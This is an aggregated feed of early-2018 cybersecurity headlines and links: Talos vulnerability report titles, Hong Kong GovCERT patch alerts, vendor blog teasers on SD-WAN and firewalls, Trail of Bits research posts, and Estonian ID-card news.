Every organization eventually needs to re-evaluate their existing firewall vendors. This can be a result of a vendor issuing an EoL (End of Life) announcement, budget constraints, product limitations, a pending hardware refresh, or some other unavoidable consideration. In these situations, network managers need to evaluate the state of their vendor’s firewall and the future... The post Firewall as a Service vs UTM appeared first on Cato Networks.

https://www.catonetworks.com/blog/firewall-as-a-service-vs-utm/
Ready to Respond to the Cyber Norms Debate
2018-04-23T10:00:00Z | 1524477600

Klée Aiken, APNIC's External Relations Manager, shares his views on cyber norms and how they will impact incident responders.

https://www.first.org/blog/20180423-cyber-norms
Security Alert (A18-04-08): Multiple Vulnerabilities in Cisco Products
2018-04-19T04:00:00Z | 1524110400

Cisco has released 7 security advisories fixing a number of vulnerabilities in several Cisco products.

https://www.govcert.gov.hk/en/alerts_detail.php
Foxit PDF Reader AssociatedFile Annotation Type Confusion
2018-04-19T00:00:00Z | 1524096000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0526
SAP BPC Web Application Information Disclosure Vulnerability
2018-04-19T00:00:00Z | 1524096000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0551
Foxit PDF Reader JavaScript createTemplate Remote Code Execution Vulnerability
2018-04-19T00:00:00Z | 1524096000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0536
Foxit PDF Reader Javascript Search Query Remote Code Execution Vulnerability
2018-04-19T00:00:00Z | 1524096000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0506
Foxit PDF Reader JavaScript XFA Clone Remote Code Execution Vulnerability
2018-04-19T00:00:00Z | 1524096000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0532
Foxit PDF Reader JavaScript setPersistent Remote Code Execution Vulnerability
2018-04-19T00:00:00Z | 1524096000

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0525
High Threat Security Alert (A18-04-06): Protecting the Network Infrastructure
2018-04-18T04:00:00Z | 1524024000

Reports indicate that there is elevated risk of cyber attacks on vulnerable network devices. Users are advised to patch and harden all network devices immediately.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-04-07): Multiple Vulnerabilities in Oracle Java and Oracle Products (April 2018)
2018-04-18T04:00:00Z | 1524024000

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Top Webinars on SD-WAN Technology and Solutions
2018-04-17T06:20:54Z | 1523946054

According to a report from Forrester, 90% of Network Managers are looking to evolve their WAN with a software-defined approach.  IT Managers and business leaders may find it hard to find time to attend conferences, and webinars are a great alternative to stay current on the latest technologies.  Below are valuable on-demand webinars that answer... The post Top Webinars on SD-WAN Technology and Solutions appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-webinars-on-sd-wan-technology-and-solutions/
Foscam IP Video Camera Firmware Recovery Unsigned Image Vulnerability
2018-04-17T00:00:00Z | 1523923200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0378
What is Firewall as a Service (FWaaS) and Why You Need It
2018-04-16T06:02:57Z | 1523858577

Since the beginning of networks, the lynchpin of network security has been the firewall.  The first network firewalls appeared in the late 1980s, and gained almost universal acceptance by the early 1990s.  It was not until 2009 when firewalls as we know them started to undergo a significant change with the rise of the Next... The post What is Firewall as a Service (FWaaS) and Why You Need It appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-is-firewall-as-a-service-fwaas-and-why-you-need-it/
Introducing Web Security Analytics
2018-04-14T13:00:00Z | 1523710800

Every security team knows that the success of any security product relies heavily on the ability to maintain an optimal security configuration. Any misconfiguration can result in malicious or undesired traffic reaching the application, or worse - legitimate traffic being blocked. In addition, it can result in noisy false positive security events, which can eventually mask real attacks from being detected and blocked. What is Web Security Analytics? Akamai's new Web Security Analytics tool provides a single unified and efficient interface to assess a wide range of security events, perform analysis of events, and evaluate any needed changes in order to maintain an optimal security configuration. For example, customers can use this tool to better:

https://www.akamai.com/blog/security/introducing-web-security-analytics
Moxa EDR-810 Web Server strcmp Multiple Denial of Service Vulnerabilities
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0474
Moxa EDR-810 Web Server Cross-Site Request Forgery Vulnerability
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0478
Moxa EDR-810 Web Server Certificate Signing Request Command Injection Vulnerability
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0477
Moxa EDR-810 Web Server Weak Cryptography for Passwords Vulnerability
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0481
Moxa EDR-810 Web RSA Key Generation Command Injection Vulnerability
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0473
Moxa EDR-810 Web Server OpenVPN Config Multiple Command Injection Vulnerabilities
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0482
Moxa EDR-810 Server Agent Information Disclosure Vulnerability
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0480
Moxa EDR-810 Web Server ping Command Injection Vulnerability
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0472
Moxa EDR-810 Web Server URI Denial of Service Vulnerability
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0476
Moxa EDR-810 Cleartext Transmission of Password Vulnerability
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0475
Moxa EDR-810 Service Agent Multiple Denial of Service Vulnerabilities
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0487
Moxa EDR-810 Plaintext Password Storage Vulnerability
2018-04-13T00:00:00Z | 1523577600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0479
The Dark Side of APIs: Part 1, API Overview
2018-04-12T13:00:00Z | 1523538000

Application Programming Interfaces (API) are a software design approach which enables software and system developers to integrate with other systems based on a defined set of communication methods. APIs serve as software building blocks and allow for software reuse - essentially allowing fast development of new systems based on existing capabilities.

https://www.akamai.com/blog/security/the-dark-side-of-apis--part-1--api-overview
WAN Optimization vs. SD-WAN, or Why You Need Both
2018-04-12T07:14:40Z | 1523517280

The widespread adoption of Software-Defined Wide-Area-Network (SD-WAN) in recent years has caused many to wonder whether WAN optimization is still necessary.  The technologies are similar. Both improve the underlying network but they do so in different ways: WAN optimization improves the throughput of a specific link; SD-WAN improves the agility and manageability of the full... The post WAN Optimization vs. SD-WAN, or Why You Need Both appeared first on Cato Networks.

https://www.catonetworks.com/blog/wan-optimization-vs-sd-wan-or-why-you-need-both/
The GDPR and WHOIS privacy
2018-04-12T07:00:00Z | 1523516400

Background on the issue

https://www.first.org/blog/20180412_GDPR_and_WHOIS
NASA CFITSIO `ffghbn` and `ffghtb` Stack Overflow Code Execution Vulnerabilities
2018-04-12T00:00:00Z | 1523491200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0531
NASA CFITSIO `ffgkyn` Stack Overflow Code Execution Vulnerability
2018-04-12T00:00:00Z | 1523491200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0530
NASA CFITSIO Multiple Stack Overflow Code Execution Vulnerabilities
2018-04-12T00:00:00Z | 1523491200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0529
Security Alert (A18-04-04): Multiple Vulnerabilities in Microsoft Products (April 2018)
2018-04-11T04:00:00Z | 1523419200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-04-05): Multiple Vulnerabilities in Adobe Flash Player
2018-04-11T04:00:00Z | 1523419200

Adobe released a security update to address vulnerabilities found in the Adobe Flash Player.

https://www.govcert.gov.hk/en/alerts_detail.php
Computerinsel Photoline PCX Run Length Code Execution Vulnerability
2018-04-11T00:00:00Z | 1523404800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0562
Computerinsel Photoline PSD Blending Channels Code Execution Vulnerability
2018-04-11T00:00:00Z | 1523404800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0550
Computerinsel Photoline TIFF Bits Per Pixel Parsing Code Execution Vulnerability
2018-04-11T00:00:00Z | 1523404800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0547
Computerinsel Photoline PCX Bits Per Pixel Code Execution Vulnerability
2018-04-11T00:00:00Z | 1523404800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0564
Computerinsel Photoline PCX Decompress Code Execution Vulnerability
2018-04-11T00:00:00Z | 1523404800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0561
Computerinsel Photoline TIFF Samples Per Pixel Parsing Code Execution Vulnerability
2018-04-11T00:00:00Z | 1523404800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0546
Computerinsel Photoline PCX Color Map Code Execution Vulnerability
2018-04-11T00:00:00Z | 1523404800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0563
What do you wish osquery could do?
2018-04-10T10:50:44Z | 1523357444

Welcome to the third post in our series about osquery. So far, we’ve described how five enterprise security teams use osquery and reviewed the issues they’ve encountered. For our third post, we focus on the future of osquery. We asked users, “What do you wish osquery could do?” The answers we received ranged from small […]

https://blog.trailofbits.com/2018/04/10/what-do-you-wish-osquery-could-do/
3 ways Cato Cloud isn’t your father’s (or mother’s) SD-WAN
2018-04-10T10:08:14Z | 1523354894

IT teams are excited about the opportunities afforded by SD-WAN. Rapid deployment. Incredible capacity. If you’ve read this blog for any amount of time (or followed SD-WAN’s development in other blogs for that matter) you’ll know what I’m talking about. But what’s interesting about Cato SD-WAN is that even the SD-WAN hype doesn’t do it... The post 3 ways Cato Cloud isn’t your father’s (or mother’s) SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/3-ways-cato-cloud-isnt-your-fathers-or-mothers-sd-wan/
CERT NZ Statement about WHOIS and GDPR
2018-04-10T07:00:00Z | 1523343600

CERT NZ describes how important the usage of WHOIS is during an incident investigation.

https://www.first.org/blog/20180410-CERT_NZ_Statement_on_WHOIS
Simple DirectMedia Layer SDL2_Image IMG_LoadPCX_RW Information Disclosure Vulnerability
2018-04-10T00:00:00Z | 1523318400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0519
Simple DirectMedia Layer SDL2_Image load_xcf_tile_rle Information Disclosure Vulnerability
2018-04-10T00:00:00Z | 1523318400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0520
Simple DirectMedia Layer SDL2_Image load_xcf_tile_rle bpp Code Execution Vulnerability
2018-04-10T00:00:00Z | 1523318400

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0521
Zabbix Server Config Proxy Request Information Disclosure Vulnerability
2018-04-09T00:00:00Z | 1523232000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0327
How to prepare for a security review
2018-04-06T10:50:33Z | 1523011833

You’ve just approved a security review of your codebase. Do you: Send a copy of the repository and wait for the report, or Take the extra effort to set the project up for success? By the end of the review, the difference between these answers will lead to profoundly disparate results. In the former case, […]

https://blog.trailofbits.com/2018/04/06/how-to-prepare-for-a-security-audit/
IBM DB2 Shared Memory Insecure Permissions Vulnerability
2018-04-06T00:00:00Z | 1522972800

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0558
Vulnerability Modeling with Binary Ninja
2018-04-04T10:50:35Z | 1522839035

Plenty of static analyzers can perform vulnerability discovery on source code, but what if you only have the binary? How can we model a vulnerability and then check a binary to see if it is vulnerable? The short answer: use Binary Ninja’s MLIL and SSA form. Together, they make it easy to build and solve a system of equations with a theorem prover that takes binaries and turns them, alchemy-like, into vulnerabilities!

https://blog.trailofbits.com/2018/04/04/vulnerability-modeling-with-binary-ninja/
MPLS, VPN Internet Access, Cloud Networking or SD-WAN? Choose Wisely
2018-04-04T09:12:12Z | 1522833132

When it comes to the enterprise network, decisions need to be made with cost, performance, security, and future plans in mind.  Enterprise networking is moving from traditional hub-and-spoke WAN architectures to infrastructure that must support the migration of critical applications to the cloud.  And yet, according to Gartner analyst Joe Skorupa, “When businesses decide to... The post MPLS, VPN Internet Access, Cloud Networking or SD-WAN? Choose Wisely appeared first on Cato Networks.

https://www.catonetworks.com/blog/mpls-vpn-internet-access-cloud-networking-or-sd-wan-choose-wisely/
Security Alert (A18-04-03): Vulnerability in Microsoft Malware Protection Engine
2018-04-04T04:00:00Z | 1522814400

Microsoft has released a security update addressing a vulnerability in the Microsoft Malware Protection Engine.

https://www.govcert.gov.hk/en/alerts_detail.php
Natus Xltek EEG NeuroWorks OpenProducer Code Execution Vulnerability
2018-04-04T00:00:00Z | 1522800000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0375
Natus Xltek EEG NeuroWorks RequestForPatientInfoEEGfile Code Execution Vulnerability
2018-04-04T00:00:00Z | 1522800000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0355
Natus Xltek EEG NeuroWorks NewProducerStream Code Execution Vulnerability
2018-04-04T00:00:00Z | 1522800000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0374
Natus Xltek EEG NeuroWorks NewProducerStream Use of Return Value Denial of Service Vulnerability
2018-04-04T00:00:00Z | 1522800000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0365
Natus Xltek EEG NeuroWorks SavePatientMontage Code Execution Vulnerability
2018-04-04T00:00:00Z | 1522800000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0373
Circle with Disney WiFi Insecure Access Point Vulnerability
2018-04-04T00:00:00Z | 1522800000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0447
Security Alert (A18-04-01): Vulnerability in Microsoft Products
2018-04-03T04:00:00Z | 1522728000

Microsoft has released a security advisory addressing the kernel-level privilege escalation vulnerability, affecting Microsoft Windows 7(x64) and Server 2008 R2(x64). Reports indicate that the proof-of-concept exploit code is available on the Internet.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-04-02): Multiple Vulnerabilities in Apple iOS
2018-04-03T04:00:00Z | 1522728000

On 29 March 2018, Apple released security updates in its latest iOS version 11.3 to fix 44 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Moxa AWK-3131A Multiple Features Login Username Parameter OS Command Injection Vulnerability
2018-04-03T00:00:00Z | 1522713600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0507
Paysafe Fixes Active Directory, Improves Throughput, and Reduces Costs By Converging MPLS and Internet-based VPN onto Cato Cloud
2018-04-02T10:41:08Z | 1522665668

With executives started to complain about being unable to access corporate resources when visiting other company offices, the IT team at Paysafe knew the time was ripe for WAN transformation. Those complaints were just the symptom of the costs and complexity that had developed around their global network architecture. Paysafe is a leading global provider... The post Paysafe Fixes Active Directory, Improves Throughput, and Reduces Costs By Converging MPLS and Internet-based VPN onto Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/paysafe-fixes-active-directory-improves-throughput-and-reduces-costs-by-converging-mpls-and-internet-based-vpn-onto-cato-cloud/
Uuendati enamik elektrooniliselt kasutatud ID-kaartidest
2018-04-01T21:00:00Z | 1522616400

Turvariskiga ID-kaartidest uuendasid kasutajad märtsi lõpuks 494 000 kaarti, mis on 95 protsenti elektrooniliselt kasutatud kaartidest. 1. aprilli seisuga tunnistati ligi 300 000 kaardi sertifikaadid kehtetuks. Isikut tõendava ja reisidokumendina kehtivad kaardid edasi kuni kaardile märgitud kuupäevani.

https://ria.ee/uudised/uuendati-enamik-elektrooniliselt-kasutatud-id-kaartidest
Why SD-WAN is the Future of Global Connectivity
2018-03-29T08:25:20Z | 1522311920

We’ve long touted the benefits of a software-defined wide area network (SD-WAN) so it’s encouraging to see that enterprises are increasingly recognizing its value. IDC recently surveyed mid-market enterprises and found they are rapidly embracing SD-WAN infrastructure and services. Surveyed companies cited bandwidth optimization, consistent application security, improved automation, and self-provisioning as top reasons why... The post Why SD-WAN is the Future of Global Connectivity appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-sd-wan-is-the-future-of-global-connectivity/
Security Alert (A18-03-07): Multiple Vulnerabilities in Cisco Products (March 2018)
2018-03-29T04:00:00Z | 1522296000

Cisco has released 20 security advisories fixing a number of vulnerabilities in Cisco IOS and IOS XE software, of which 3 advisories are rated as critical and 17 advisories are rated as high.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-03-08): Vulnerability in Drupal
2018-03-29T04:00:00Z | 1522296000

Drupal has published a security advisory to address a vulnerability found in Drupal core.

https://www.govcert.gov.hk/en/alerts_detail.php
Top Networking and SD-WAN News Websites
2018-03-28T10:21:19Z | 1522232479

Finding it difficult to keep up to date with changes in enterprise networking technologies? We hear you. But have no fear! We have researched hundreds of networking blogs and news websites so you don’t have to. Below we have listed the top 15 sites and blogs on the subject of networking and SD-WAN that should... The post Top Networking and SD-WAN News Websites appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-networking-and-sd-wan-news-websites/
Illuminating the Path to Digital Maturity
2018-03-28T04:00:00Z | 1522209600

Research By Akamai and Forrester Sheds New Light on Digital Experience Challenges and Opportunities Nearly every business today is striving to create and deliver digital experiences that stand apart. But it's no small task turning those visions into reality. Moreover,...

https://www.akamai.com/blog/news/illuminating-the-path-to-digital-maturity-research-by-akamai-and-forrester-sheds-new-light-on-digital
Allen Bradley Micrologix 1400 Series B Ethernet Card Malformed Packet Denial of Service Vulnerability
2018-03-28T00:00:00Z | 1522195200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0440
Nvidia D3D10 Driver Pixel Shader Heap Memory Corruption Vulnerability
2018-03-28T00:00:00Z | 1522195200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0514
Allen Bradley Micrologix 1400 Series B Memory Module Store Program File Write Vulnerability
2018-03-28T00:00:00Z | 1522195200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0444
Allen Bradley Micrologix 1400 Series B SNMP-Set Processing Incorrect Behavior Order Denial of Service Vulnerability
2018-03-28T00:00:00Z | 1522195200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0442
Allen Bradley Micrologix 1400 Series B Unauthenticated Data/Program/Function File Improper Access Control Vulnerability
2018-03-28T00:00:00Z | 1522195200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0443
Allen Bradley Micrologix 1400 Series B Ladder Logic Program Download Device Fault Denial of Service Vulnerability
2018-03-28T00:00:00Z | 1522195200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0441
Allen Bradley Micrologix 1400 Series B PLC Session Communication Insufficient Resource Pool Denial of Service Vulnerability
2018-03-28T00:00:00Z | 1522195200

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0445
Nvidia D3D10 Driver Pixel Shader Functionality Denial Of Service
2018-03-28T00:00:00Z | 1522195200

https://talosintelligence.com/vulnerability_reports/TALOS-2018-0522
A Long History of Building Trust and Engagement
2018-03-27T10:00:00Z | 1522144800

Microsoft's Principal Security Program Manager, Jerry Bryant, discusses a long history of building trust and engagement in security.

https://www.first.org/blog/20180327-A_long_history_of_building_trust_and_engagement
10 Reasons To Choose Firewall as a Service For Your Enterprise
2018-03-27T08:52:29Z | 1522140749

Recent trends in enterprise networking have created a challenge for network security engineers. The rise of mobile devices, combined with the shift to cloud based platforms, means that many networks no longer have a clear perimeter, where all applications and users  could be jointly protected against cyber-attacks. Today, we have to move with the times... The post 10 Reasons To Choose Firewall as a Service For Your Enterprise appeared first on Cato Networks.

https://www.catonetworks.com/blog/10-reasons-to-choose-firewall-as-a-service-for-your-enterprise/
ID-kaarte saab uuendada laupäeva hilisõhtuni
2018-03-26T21:00:00Z | 1522098000

Peatatud sertifikaatidega ID-kaarte saab uuendada veel selle laupäeva hilisõhtuni. 1. aprillist on uuendamata sertifikaadid tunnistatud kehtetuks ning ID-kaardi elektrooniliseks kasutamiseks tuleb taotleda uus dokument ja tasuda ka riigilõiv.

https://ria.ee/uudised/id-kaarte-saab-uuendada-laupaeva-hilisohtuni
Use our suite of Ethereum security tools
2018-03-23T04:28:08Z | 1521779288

Two years ago, when we began taking on blockchain security engagements, there were no tools engineered for the work. No static analyzers, fuzzers, or reverse engineering tools for Ethereum. So, we invested significant time and expertise to create what we needed, adapt what we already had, and refine the work continuously over dozens of audits. […]

https://blog.trailofbits.com/2018/03/23/use-our-suite-of-ethereum-security-tools/
2018 Networking Survey: The Curse of Complexity Continues
2018-03-22T13:23:08Z | 1521724988

The patchwork of appliances and network services comprising our wide area networks (WAN) have been with us for so long it’s easy to overlook their impact on IT. High capital costs, hours spent maintaining and updating appliances, protracted troubleshooting times —  so many of the networking challenges facing IT can be attributed to isolated factors... The post 2018 Networking Survey: The Curse of Complexity Continues appeared first on Cato Networks.

https://www.catonetworks.com/blog/2018-networking-survey-the-curse-of-complexity-continues/
An accessible overview of Meltdown and Spectre, Part 2
2018-03-22T10:50:19Z | 1521715819

This is the second half of our blog post on the Meltdown an Spectre vulnerabilities, describing Spectre Variant 1 (V1) and Spectre Variant 2 (V2). If you have not done so already, please review the first blog post for an accessible review of computer architecture fundamentals. This blog post will start by covering the technical […]

https://blog.trailofbits.com/2018/03/22/an-accessible-overview-of-meltdown-and-spectre-part-2/
Stratoscale Boosts Throughput 8X with Cato Cloud
2018-03-21T09:36:31Z | 1521624991

Delivering the necessary throughput to distributed teams remains a challenge for IT professionals. The unpredictability of the Internet can wreak havoc with long-distance connections. Just ask Stratoscale. Background The company provides cloud building blocks to modernize and future-proof the enterprise on-premises environment. The research and development (R&D) is spread between its Israeli headquarters and North... The post Stratoscale Boosts Throughput 8X with Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/stratoscale-boosts-throughput-8x-with-cato-cloud/
What To Look For in a SD-WAN Vendor
2018-03-20T10:27:40Z | 1521541660

MPLS networks have been the standard configuration for enterprise networks for years, providing predictability and availability. However dependable, MPLS comes with its own set of challenges, such as expensive connectivity and long deployment times.  MPLS is much more expensive compared to standard Internet, and can take anywhere from 60-120 days to provision. MPLS also doesn’t... The post What To Look For in a SD-WAN Vendor appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-to-look-for-in-a-sd-wan-vendor/
SD-WAN and Security: The Architecture is All that Matters
2018-03-19T16:41:07Z | 1521477667

For the past two years, Cato Networks has led a revolution in enterprise networking: the convergence of software-defined wide area networks (SD-WAN) and network security delivered as a single cloud service. For decades, networking and security evolved as silos, creating separate point products in each category. Convergence is the antithesis to bundling of point solutions. It... The post SD-WAN and Security: The Architecture is All that Matters appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-and-security-the-architecture-is-all-that-matters/
Recovering Plaintext Passwords from Azure Virtual Machines
2018-03-19T13:00:00Z | 1521464400

Security design flaw in the VM Access plugin that may enable a cross platform attack impacting every machine type provided by Azure. Read More...

https://www.akamai.com/blog/security/recovering-plaintext-passwords-azure
Security Alert (A18-03-05): Vulnerability in VMware Products
2018-03-19T04:00:00Z | 1521432000

VMware has published a security advisory to address a vulnerability found in VMware Workstation version 12.x and 14.x, as well as VMWare Fusion version 8.x and 10.x.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-03-06): Multiple Vulnerabilities in Firefox
2018-03-19T04:00:00Z | 1521432000

Mozilla has published a security advisory to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
“AMD Flaws” Technical Summary
2018-03-15T17:58:03Z | 1521136683

Two weeks ago, we were engaged by CTS Labs as independent consultants at our standard consulting rates to review and confirm the technical accuracy of their preliminary findings. We participated neither in their research nor in their subsequent disclosure process. Our recommendation to CTS was to disclose the vulnerabilities through a CERT. Our review of […]

https://blog.trailofbits.com/2018/03/15/amd-flaws-technical-summary/
Experiments with Browser Preconnects
2018-03-15T13:00:00Z | 1521118800

https://www.akamai.com/blog/performance/2024/sep/experiments-with-browser-preconnects
Inside Cato’s Advanced Security Services
2018-03-15T11:18:28Z | 1521112708

More and more IT managers are interested in converging SD-WAN with network security — and for good reason.  An agile, efficient, and ubiquitous security architecture is essential if organizations are to fully transform their networks. But as we’ve noted before, traditional SD-WAN fails to adequately address the security dimension, relying on existing security appliances and... The post Inside Cato’s Advanced Security Services appeared first on Cato Networks.

https://www.catonetworks.com/blog/inside-catos-advanced-security-services/
VMware VNC Lock Count Denial of Service Vulnerability
2018-03-15T00:00:00Z | 1521072000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0376
Security Alert (A18-03-02): Multiple Vulnerabilities in Microsoft Products (March 2018)
2018-03-14T04:00:00Z | 1521000000

Microsoft has released 47 security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-03-03): Multiple Vulnerabilities in Adobe Flash Player
2018-03-14T04:00:00Z | 1521000000

Adobe released a security update to address vulnerabilities found in the Adobe Flash Player.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A18-03-04): Multiple Vulnerabilities in Firefox
2018-03-14T04:00:00Z | 1521000000

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Riigiportaal saab 15-aastaseks
2018-03-11T22:00:00Z | 1520805600

Täna, 12. märtsil tähistab riigiportaal eesti.ee 15. sünnipäeva.

https://ria.ee/uudised/riigiportaal-saab-15-aastaseks
Echidna, a smart fuzzer for Ethereum
2018-03-09T18:19:34Z | 1520619574

Today we released Echidna, our next-generation EVM smart fuzzer at EthCC. It’s the first-ever fuzzer to target smart contracts, and has powerful features like abstract state-machine modeling and automatic minimal test case generation. We’ve been working on it for quite some time, and are thrilled to finally share it with the world. Different interfaces for […]

https://blog.trailofbits.com/2018/03/09/echidna-a-smart-fuzzer-for-ethereum/
Security Alert (A18-03-01): Multiple Vulnerabilities in IBM Notes
2018-03-09T04:00:00Z | 1520568000

Multiple vulnerabilities are found in IBM Notes and its System Diagnostics service.

https://www.govcert.gov.hk/en/alerts_detail.php
2017 in review
2018-03-08T12:50:56Z | 1520513456

What a roller coaster of a year! Well, outside of our office. Inside, 2017 was excellent. We published novel research that advanced – among others – the practices of automated bug discovery, symbolic execution, and binary translation. In the process, we improved many foundational tools that an increasing number of security researchers will come to […]

https://blog.trailofbits.com/2018/03/08/2017-in-review/
Arlington Orthopedics Switches to Cato Cloud Enabling Lean IT and Agility
2018-03-05T07:57:47Z | 1520236667

With IT called to support more users and deliver more services without increasing budget, the IT team at Arlington Orthopedics P.A. faced the kind of pincer move all too familiar to IT professionals. Normally, such an objective would be mission impossible for a network built on MPLS and firewall appliances. The sheer complexity and cost... The post Arlington Orthopedics Switches to Cato Cloud Enabling Lean IT and Agility appeared first on Cato Networks.

https://www.catonetworks.com/blog/arlington-orthopedics-switches-to-cato-cloud-enabling-lean-it-and-agility/
Valitsus kiitis heaks küberturvalisuse seaduse eelnõu
2018-03-01T22:00:00Z | 1519941600

Eile, 1. märtsil kiitis Vabariigi Valitsus heaks küberturvalisuse seaduse eelnõu ning esitas selle Riigikogu menetlusse.

https://ria.ee/uudised/valitsus-kiitis-heaks-kuberturvalisuse-seaduse-eelnou
Oma ID-kaardi sertifikaate saab vajadusel uuendada selle kuu lõpuni
2018-03-01T22:00:00Z | 1519941600

Märtsi alguse seisuga on uuendatud pea 441 000 ID-kaardi sertifikaadid, sellest kauguuendamise teel üle 322 000 kaardi sertifikaadid. ID-kaardi sertifikaate saab uuendada 31. märtsini.

https://ria.ee/uudised/oma-id-kaardi-sertifikaate-saab-vajadusel-uuendada-selle-kuu-lopuni
Simple DirectMedia Layer SDL2_image ICO Pitch Handling Code Execution Vulnerability
2018-03-01T00:00:00Z | 1519862400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0490
Simple DirectMedia Layer SDL2_Image LWZ Decompression Buffer Overflow Vulnerability
2018-03-01T00:00:00Z | 1519862400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0499
Simple DirectMedia Layer SDL2_image load_xcf_tile_rle Decompression Code Execution Vulnerability
2018-03-01T00:00:00Z | 1519862400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0497
Simple DirectMedia Layer SDL2_image Image Palette Population Code Execution Vulnerability
2018-03-01T00:00:00Z | 1519862400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0491
Simple DirectMedia Layer SDL2_image ILBM CMAP Parsing Code Execution Vulnerability
2018-03-01T00:00:00Z | 1519862400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0489
Simple DirectMedia Layer SDL2_image do_layer_surface Double-Free Vulnerability
2018-03-01T00:00:00Z | 1519862400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0498
Simple DirectMedia Layer SDL2_Image IMG_LoadLBM_RW Code Execution Vulnerability
2018-03-01T00:00:00Z | 1519862400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0488
Dovecot IMAP Server rfc822_parse_domain Information Leak Vulnerability
2018-03-01T00:00:00Z | 1519862400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0510
SD-WAN vs. MPLS vs. Public Internet
2018-02-28T15:49:17Z | 1519832957

For better or worse, businesses are becoming more globalized by the day. Business-critical traffic is increasingly routed between offices across borders, incurring packet loss and latency that are completely unacceptable. Network architectures that served us well for years no longer fit global business in 2017. To meet the needs of a global enterprise, our network... The post SD-WAN vs. MPLS vs. Public Internet appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-vs-mpls-vs-public-internet/
Your Cache is Exposed
2018-02-27T07:52:00Z | 1519717920

